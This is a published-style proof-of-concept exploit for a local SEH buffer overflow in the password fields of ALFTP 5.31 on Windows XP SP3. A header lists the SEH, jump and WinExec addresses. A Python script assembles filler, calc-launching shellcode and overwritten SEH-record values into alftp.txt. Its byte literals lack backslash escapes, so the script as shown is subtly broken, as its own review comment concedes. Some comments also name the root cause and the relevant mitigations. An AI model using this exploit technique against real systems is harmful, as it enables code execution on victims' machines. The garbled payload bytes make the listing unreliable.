# Exploit Title: ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)
# Exploit Author: Gokul Babu
# Vendor Homepage: http://www.altools.com/downloads/alftp.aspx
# Vulnerable Software: http://advert.estsoft.com/?event=201001127730323
# Tested on: Windows XP Professional SP3 -Version-2002
# Steps to reproduce-1: (eip overwrite-88-windows-XP)
# Paste the contents of alftp.txt in 'options->Preference->Security->New password &Confirm password'

#seh- 0041A6EF "xEFxA6x41"
#address to jump 0012FA7A
#nseh- "xEBxACx90x90"
#winexec address 0x7c862aed

#!/usr/bin/python

# Proof-of-concept input generator for the ALFTP 5.31 password-field overflow
# named in the header: it assembles one string and writes it to alftp.txt.
#
# NOTE(review): as published on this page the literals carry no backslash
# escapes, so Python treats them as ordinary ASCII text and len() counts
# characters. Do not build detection signatures from this listing or its
# output without confirming the byte layout against the original advisory.
#
# Defensive reading: the values documented in the header (SEH handler, jump
# target, WinExec address) are absolute addresses, and the header lists only
# Windows XP Professional SP3 as tested. The root cause to fix is the missing
# length check on the password fields; SafeSEH/SEHOP, DEP and ASLR are the
# platform mitigations relevant to this class of SEH-overwrite bug.

# Payload fragment, kept as separate pieces exactly as in the original listing.
shellcode = "".join((
    "x33xC0",
    "x50",
    "x68x63x61x6Cx63",
    "x8BxC4",
    "x50",
    "xE8x61x30x73x7C",
))

filler = "x90"
nseh_field = "xEBxACx90x90"   # value the header labels "nseh"
seh_field = "xEFxA6x41"       # value the header labels "seh" (0041A6EF)

# Layout: 4 fillers, the payload, fillers up to the count of 80 used by the
# original arithmetic, then the two SEH-record fields.
buf = "".join([
    filler * 4,
    shellcode,
    filler * (80 - len(shellcode)),
    nseh_field,
    seh_field,
])

# Write the result where the reproduction step expects to find it.
with open("alftp.txt", "w") as out_file:
    out_file.write(buf)